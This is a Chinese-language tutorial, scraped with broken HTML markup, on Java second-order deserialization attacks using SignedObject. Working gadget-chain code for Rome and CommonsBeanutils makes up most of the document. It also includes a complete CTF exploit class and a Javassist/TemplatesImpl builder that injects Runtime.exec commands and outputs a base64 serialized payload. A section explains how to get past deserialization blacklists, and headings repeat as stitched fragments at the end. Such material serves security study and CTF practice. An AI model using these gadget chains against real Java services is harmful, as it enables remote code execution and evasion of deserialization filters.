Java二次反序列化漏洞深入解析与利用<\/h1>

1. SignedObject类安全漏洞分析<\/h2>
`SignedObject<\/code>是java.security<\/code>包下的一个类，用于创建带有数字签名的运行时对象。它包含另一个Serializable<\/code>对象，并通过数字签名确保其完整性。<\/p>`

1.1 关键漏洞点<\/h3>
SignedObject<\/code>类的getObject()<\/code>方法存在反序列化漏洞：<\/p>
public<\/span> Object getObject<\/span>()<\/span>
<\/span><\/span>    throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>    \/\/ 创建序列化输入流
<\/span><\/span><\/span><\/span>    ByteArrayInputStream bais =<\/span> new<\/span> ByteArrayInputStream(<\/span>this<\/span>.<\/span>content<\/span>);<\/span>
<\/span><\/span>    \/\/ 创建对象输入流
<\/span><\/span><\/span><\/span>    ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>bais)<\/span> {<\/span>
<\/span><\/span>        @Override<\/span>
<\/span><\/span>        protected<\/span> Class<?><\/span> resolveClass(<\/span>ObjectStreamClass desc)<\/span>
<\/span><\/span>            throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>            \/\/ 这里没有对反序列化的类做任何限制
<\/span><\/span><\/span><\/span>            return<\/span> super<\/span>.<\/span>resolveClass<\/span>(<\/span>desc);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    };<\/span>
<\/span><\/span>    \/\/ 执行反序列化
<\/span><\/span><\/span><\/span>    return<\/span> ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>关键问题：<\/p>

反序列化内容是可控的（通过构造函数传入）<\/li>
没有对反序列化的类做任何限制<\/li>
该方法是一个getter方法，容易被各种反序列化链调用<\/li>
<\/ol>
1.2 漏洞利用思路<\/h3>
利用SignedObject<\/code>进行二次反序列化的基本流程：<\/p>

创建一个包含恶意对象的SignedObject<\/code><\/li>
构造一个调用链触发getObject()<\/code>方法<\/li>
在getObject()<\/code>方法执行时触发内部恶意对象的反序列化<\/li>
<\/ol>
示例构造代码：<\/p>
KeyPairGenerator kpg =<\/span> KeyPairGenerator.<\/span>getInstance<\/span>(<\/span>"DSA"<\/span>);<\/span>
<\/span><\/span>kpg.<\/span>initialize<\/span>(<\/span>1024<\/span>);<\/span>
<\/span><\/span>KeyPair kp =<\/span> kpg.<\/span>generateKeyPair<\/span>();<\/span>
<\/span><\/span>SignedObject signedObject =<\/span> new<\/span> SignedObject(<\/span>恶意对象<\/span>,<\/span> kp.<\/span>getPrivate<\/span>(),<\/span> Signature.<\/span>getInstance<\/span>(<\/span>"DSA"<\/span>));<\/span>
<\/span><\/span><\/code><\/pre>2. 利用链分析<\/h2>
2.1 Rome链利用<\/h3>
Rome是一个Java库，其中的EqualsBean<\/code>和ToStringBean<\/code>类可以触发getter方法。<\/p>
2.1.1 ToStringBean利用链<\/h4>
调用链：<\/p>
HashMap.readObject()
  -> ObjectBean.hashCode()
    -> ToStringBean.toString()
      -> Method.invoke()
        -> SignedObject.getObject()
          -> 内部恶意对象反序列化
<\/code><\/pre>
实现代码：<\/p>
public<\/span> class<\/span> ToStringBeanEXP<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> setFieldValue<\/span>(<\/span>Object obj,<\/span> String fieldname,<\/span> Object value)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Field field =<\/span> obj.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>fieldname);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>obj,<\/span> value);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    public<\/span> static<\/span> HashMap getpayload<\/span>(<\/span>Class clazz,<\/span> Object obj)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        ObjectBean objectBean =<\/span> new<\/span> ObjectBean(<\/span>ObjectBean.<\/span>class<\/span>,<\/span> new<\/span> ObjectBean(<\/span>String.<\/span>class<\/span>,<\/span> "rand"<\/span>));<\/span>
<\/span><\/span>        HashMap hashMap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>        hashMap.<\/span>put<\/span>(<\/span>objectBean,<\/span> "rand"<\/span>);<\/span>
<\/span><\/span>        ObjectBean expObjectBean =<\/span> new<\/span> ObjectBean(<\/span>clazz,<\/span> obj);<\/span>
<\/span><\/span>        setFieldValue(<\/span>objectBean,<\/span> "_equalsBean"<\/span>,<\/span> new<\/span> EqualsBean(<\/span>ObjectBean.<\/span>class<\/span>,<\/span> expObjectBean));<\/span>
<\/span><\/span>        return<\/span> hashMap;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.1.2 EqualsBean利用链<\/h4>
调用链：<\/p>
Hashtable.readObject()
  -> AbstractMap.equals()
    -> EqualsBean.equals()
      -> Method.invoke()
        -> SignedObject.getObject()
          -> 内部恶意对象反序列化
<\/code><\/pre>
实现代码：<\/p>
public<\/span> class<\/span> EqualsBeanEXP<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> Hashtable getPayload<\/span>(<\/span>Class clazz,<\/span> Object payloadObj)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        EqualsBean bean =<\/span> new<\/span> EqualsBean(<\/span>String.<\/span>class<\/span>,<\/span> "r"<\/span>);<\/span>
<\/span><\/span>        HashMap map1 =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>        HashMap map2 =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>        map1.<\/span>put<\/span>(<\/span>"yy"<\/span>,<\/span> bean);<\/span>
<\/span><\/span>        map1.<\/span>put<\/span>(<\/span>"zZ"<\/span>,<\/span> payloadObj);<\/span>
<\/span><\/span>        map2.<\/span>put<\/span>(<\/span>"zZ"<\/span>,<\/span> bean);<\/span>
<\/span><\/span>        map2.<\/span>put<\/span>(<\/span>"yy"<\/span>,<\/span> payloadObj);<\/span>
<\/span><\/span>        Hashtable table =<\/span> new<\/span> Hashtable();<\/span>
<\/span><\/span>        table.<\/span>put<\/span>(<\/span>map1,<\/span> "1"<\/span>);<\/span>
<\/span><\/span>        table.<\/span>put<\/span>(<\/span>map2,<\/span> "2"<\/span>);<\/span>
<\/span><\/span>        setFieldValue(<\/span>bean,<\/span> "_beanClass"<\/span>,<\/span> clazz);<\/span>
<\/span><\/span>        setFieldValue(<\/span>bean,<\/span> "_obj"<\/span>,<\/span> payloadObj);<\/span>
<\/span><\/span>        return<\/span> table;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.2 CommonsBeanutils利用链<\/h3>
org.apache.commons.beanutils.BeanComparator<\/code>的compare<\/code>方法会触发静态方法PropertyUtils#getProperty<\/code>，最终调用任意getter方法。<\/p>
调用链：<\/p>
PriorityQueue.readObject()
  -> BeanComparator.compare()
    -> PropertyUtils.getProperty()
      -> SignedObject.getObject()
        -> 内部恶意对象反序列化
<\/code><\/pre>
实现代码：<\/p>
public<\/span> class<\/span> CommonsBeanUtilsEXP<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> PriorityQueue<<\/span>Object><\/span> getpayload<\/span>(<\/span>Object object,<\/span> String string)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        BeanComparator beanComparator =<\/span> new<\/span> BeanComparator(<\/span>null<\/span>,<\/span> String.<\/span>CASE_INSENSITIVE_ORDER<\/span>);<\/span>
<\/span><\/span>        PriorityQueue priorityQueue =<\/span> new<\/span> PriorityQueue(<\/span>2<\/span>,<\/span> beanComparator);<\/span>
<\/span><\/span>        priorityQueue.<\/span>add<\/span>(<\/span>"1"<\/span>);<\/span>
<\/span><\/span>        priorityQueue.<\/span>add<\/span>(<\/span>"2"<\/span>);<\/span>
<\/span><\/span>        setFieldValue(<\/span>beanComparator,<\/span> "property"<\/span>,<\/span> string);<\/span>
<\/span><\/span>        setFieldValue(<\/span>priorityQueue,<\/span> "queue"<\/span>,<\/span> new<\/span> Object[]{<\/span>object,<\/span> null<\/span>});<\/span>
<\/span><\/span>        return<\/span> priorityQueue;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. 实际案例分析<\/h2>
3.1 HNCTF JavaMonster题目<\/h3>
题目使用了类似SignedObject<\/code>的自定义类HDCTF<\/code>，利用方式相同。<\/p>
EXP构造：<\/p>
public<\/span> class<\/span> EXP<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> bytes =<\/span> getTemplatesImpl(<\/span>"Calc"<\/span>);<\/span>
<\/span><\/span>        TemplatesImpl obj =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>        setFieldValue(<\/span>obj,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>bytes});<\/span>
<\/span><\/span>        setFieldValue(<\/span>obj,<\/span> "_name"<\/span>,<\/span> "Poria"<\/span>);<\/span>
<\/span><\/span>        setFieldValue(<\/span>obj,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>        
<\/span><\/span>        HashMap table1 =<\/span> getPayload(<\/span>Templates.<\/span>class<\/span>,<\/span> obj);<\/span>
<\/span><\/span>        HDCTF hdctf =<\/span> new<\/span> HDCTF(<\/span>table1);<\/span>
<\/span><\/span>        HashMap table2 =<\/span> getPayload(<\/span>HDCTF.<\/span>class<\/span>,<\/span> hdctf);<\/span>
<\/span><\/span>        
<\/span><\/span>        ByteArrayOutputStream baos =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>        ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>baos);<\/span>
<\/span><\/span>        oos.<\/span>writeUTF<\/span>(<\/span>"USy to solve EasyJava"<\/span>);<\/span>
<\/span><\/span>        oos.<\/span>writeObject<\/span>(<\/span>table2);<\/span>
<\/span><\/span>        oos.<\/span>close<\/span>();<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>new<\/span> String(<\/span>Base64.<\/span>getEncoder<\/span>().<\/span>encode<\/span>(<\/span>baos.<\/span>toByteArray<\/span>())));<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2 恶意类构造<\/h3>
通用的恶意类构造方法（使用TemplatesImpl）：<\/p>
public<\/span> static<\/span> byte<\/span>[]<\/span> getTemplatesImpl<\/span>(<\/span>String cmd)<\/span> {<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span>
<\/span><\/span>        CtClass ctClass =<\/span> pool.<\/span>makeClass<\/span>(<\/span>"Evil"<\/span>);<\/span>
<\/span><\/span>        CtClass superClass =<\/span> pool.<\/span>get<\/span>(<\/span>"com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"<\/span>);<\/span>
<\/span><\/span>        ctClass.<\/span>setSuperclass<\/span>(<\/span>superClass);<\/span>
<\/span><\/span>        
<\/span><\/span>        CtConstructor constructor =<\/span> ctClass.<\/span>makeClassInitializer<\/span>();<\/span>
<\/span><\/span>        constructor.<\/span>setBody<\/span>(<\/span>"try { Runtime.getRuntime().exec(\""<\/span> +<\/span> cmd +<\/span> "\"); } catch (Exception ignored) {}"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        byte<\/span>[]<\/span> bytes =<\/span> ctClass.<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>        ctClass.<\/span>defrost<\/span>();<\/span>
<\/span><\/span>        return<\/span> bytes;<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>        e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        return<\/span> new<\/span> byte<\/span>[]{};<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. 防御与绕过技术<\/h2>
4.1 防御措施<\/h3>

黑名单过滤：常见防御手段，但容易被绕过<\/li>
白名单过滤：更安全但实现复杂<\/li>
禁止反序列化：最安全但可能影响功能<\/li>
<\/ol>
4.2 绕过技术<\/h3>

使用SignedObject<\/code>进行二次反序列化绕过黑名单<\/li>
利用不常见的调用链触发反序列化<\/li>
组合多个小工具链实现攻击<\/li>
<\/ol>
5. 总结<\/h2>
SignedObject<\/code>的二次反序列化漏洞主要价值在于：<\/p>

绕过黑名单防御：因为黑名单通常不会包含SignedObject<\/code>类<\/li>
实现深度攻击：可以在一次反序列化中触发多次反序列化操作<\/li>
灵活组合：可以与多种反序列化链组合使用<\/li>
<\/ol>
关键点：<\/p>

理解SignedObject.getObject()<\/code>的反序列化机制<\/li>
掌握多种触发getter方法的调用链<\/li>
能够构造有效的恶意对象<\/li>
了解如何组合这些技术绕过防御措施<\/li>
<\/ul>
Java二次反序列化漏洞深入解析与利用<\/h1>

1. SignedObject类安全漏洞分析<\/h2> SignedObject<\/code>是java.security<\/code>包下的一个类，用于创建带有数字签名的运行时对象。它包含另一个Serializable<\/code>对象，并通过数字签名确保其完整性。<\/p>

2. 利用链分析<\/h2>

2.1 Rome链利用<\/h3> Rome是一个Java库，其中的EqualsBean<\/code>和ToStringBean<\/code>类可以触发getter方法。<\/p>

3. 实际案例分析<\/h2>

4. 防御与绕过技术<\/h2>

1. SignedObject类安全漏洞分析<\/h2>
`SignedObject<\/code>是java.security<\/code>包下的一个类，用于创建带有数字签名的运行时对象。它包含另一个Serializable<\/code>对象，并通过数字签名确保其完整性。<\/p>`

2.1 Rome链利用<\/h3>
Rome是一个Java库，其中的`EqualsBean<\/code>和ToStringBean<\/code>类可以触发getter方法。<\/p>`
